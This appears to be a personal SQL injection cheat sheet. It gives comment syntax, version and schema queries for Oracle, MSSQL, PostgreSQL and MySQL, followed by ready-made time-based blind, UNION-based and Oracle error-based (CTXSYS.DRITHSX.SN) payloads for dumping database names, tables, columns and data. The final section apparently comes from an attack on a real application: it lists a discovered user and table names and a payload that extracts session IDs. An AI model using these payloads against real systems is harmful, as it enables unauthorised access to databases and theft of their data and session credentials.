SQL Injection Enumration
Oracle	--comment
Microsoft	--comment
/*comment*/
PostgreSQL	--comment
/*comment*/
MySQL	#comment
-- comment [Note the space after the double dash]
/*comment*/
---------------------------------------------------------------------------------------------------------------------------
How to Check version
Oracle:	SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft:	SELECT @@version
PostgreSQL:	SELECT version()
MySQL:	SELECT @@version
------------------------------------------------------------------------------------------------------------------------------
Database contents
Mysql
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

MSSQL
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Postgres
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Oracle
SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
------------------------------------------------------------------------------------------------------------------------------------------------
Time Delays
Oracle:	dbms_pipe.receive_message(('a'),10)
Microsoft:	WAITFOR DELAY '0:0:10'
PostgreSQL:	SELECT pg_sleep(10)
MySQL:	SELECT SLEEP(10)
----------------------------------------------------------------------------------------------------------------------------------------------------
AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)-- -
%20AND+IF((SELECT+ascii(substr(version(),1,1)))%20>%2051,sleep(10),NULL)--%20-

%20AND+IF((SELECT+ascii(substr(version(),1,1)))%20=%2053,sleep(10),NULL)--%20-   (length of version is 5)


and if(length(database()) = 5, sleep(10), null)-- -
and if(length(database()) = 5, sleep(10), null)-- -   (length of database 8)
and if(substring(database(),1,1) > 'a', sleep(10), null)-- -
current_user()
table_name()

and if(substr(select schema_name from information_schema.schemata > a, sleep(10), null)-- -

%20AND%20IF(((ascii(len((SELECT%20schema_name%20FROM information_schema.schemata%20LIMIT 0,1),1,1))))%20>%2051,sleep(10),NULL)--%20-

%20AND%20IF(((ascii(substr((SELECT%20schema_name%20FROM information_schema.schemata%20LIMIT 0,1),1,1))))%20>%2095,sleep(10),NULL)--%20-

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
For my sql error bse attack
UNION ALL SELECT NULL,NULL,version()--
'UNION ALL SELECT NULL,concat(schema_name),NULl FROM information_schema.schemata-- -
'UNION ALL SELECT NULL,concat(TABLE_NAME),NULL FROM information_schema.TABLES WHERE table_schema='admin'-- -
' UNION ALL SELECT NULL,concat(column_name),NULL FROM information_schema.COLUMNS WHERE TABLE_NAME='admin'-- -
'UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29),NULL FROM admin-- 
---------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL injection blind database dump
'WAITFOR DELAY '0:0:10'

'%20waitfor%20delay'0%3a0%3a25'--

MS sql DB

DB Length= 'IF(LEN(DB_NAME()))+>+1+WAITFOR+DELAY+'00:00:10'--

DB Name= 'IF(SUBSTRING(DB_NAME(),1,1))+>+'a'+WAITFOR+DELAY+'00:00:10'--

Table Length= 'IF(LEN((SELECT+TOP+1+NAME+FROM+sysobjects+WHERE+xtype='U'))+>+1)+WAITFOR+DELAY+'00:00:10'--

Table Name= 'IF(SUBSTRING((SELECT+TOP+1+NAME+FROM+sysobjects+WHERE+xtype='U'),1,1))+>+'a'+WAITFOR+DELAY+'00:00:10'--

Column Name = 'IF(SUBSTRING((SELECT+TOP+1+name+FROM+sys.columns+WHERE+object_id=OBJECT_ID('your_table_name')),1,1))>+'a'+WAITFOR+DELAY+'00:00:10'--
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Oracle sql injection mannually database dump(summet application)--->(refrence https://grav3m1nd-byte.gitbook.io/htb-resources/oscp-study-material/learning-sql-injection-in-oracle-databases)
'%20AND%201%3dCTXSYS.DRITHSX.SN(user,(select%20banner%20from%20v$version%20where%20rownum%3d1))--sdfdsfds
'%20AND%201%3dCTXSYS.DRITHSX.SN(user,(select%20user%20from%20dual))--sdfdsfds
'%20OR%201%3dCTXSYS.DRITHSX.SN(user,(SELECT%20username%20from(SELECT%20ROWNUM%20r,username%20from%20all_users%20order%20by%20username)%20WHERE%20r=1))--sdfdsfds
'%20OR%201%3dCTXSYS.DRITHSX.SN(user,(SELECT%20table_name%20from(SELECT%20ROWNUM%20r,table_name%20from%20all_tables%20where%20table_name%20LIKE%20'%USER%'%20order%20by%20table_name)%20WHERE%20r=1))--sdfdsfds
'%20OR%201%3dCTXSYS.DRITHSX.SN(user,(SELECT%20column_name%20from(SELECT%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20table_name%20%3d%20'USER_PRIVILEGE_MAP')%20WHERE%20r=1))--sdfdsfds
user= NOTIVADU
table name=USER_PRIVILEGE_MAP	SDO_PREFERRED_OPS_USER  I_USERSESSIONLOG_
'%20OR%201%3dCTXSYS.DRITHSX.SN(user,(SELECT%20SESSIONID%20from(SELECT%20ROWNUM%20r,SESSIONID%20from%20I_USERSESSIONLOG_%20ORDER%20BY%20SRNO)%20WHERE%20r=1))--sdfdsfds
